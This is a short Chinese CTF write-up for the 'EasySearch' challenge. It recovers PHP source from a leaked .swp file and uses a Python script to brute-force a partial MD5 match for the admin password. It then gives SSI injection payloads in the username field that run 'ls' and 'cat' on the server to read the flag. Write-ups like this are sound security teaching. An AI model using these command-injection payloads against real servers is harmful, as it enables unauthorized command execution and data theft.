EasySearch
.swp源码泄露。
<?php
ob_start();
function get_hash(){
$chars = '[email protected]#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
老规矩分析一下源码,当password满足一定的条件时,将username写入文件public/get_hash(),shtml。
先爆破一下admin:
import hashlib
def md5(string):
return hashlib.md5(string.encode('utf-8')).hexdigest()
for i in range(10000000):
if md5(str(i))[:6] == '6d0bc1':
print(i)
break
爆出来是2020666,提交后,通过抓包可以看到返回的值中有隐藏的文件名
直接访问可以读取文件。
这里涉及到了一个比较陌生的文件格式即shtml,可能存在SSI注入,详见:
当我们传入参数
username=<!--#exec cmd="ls ../"-->
password=2020666
时,将命令执行结果写入文件(这里有一层目录穿越)
读取flag
username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->
password=2020666
Last modified 8mo ago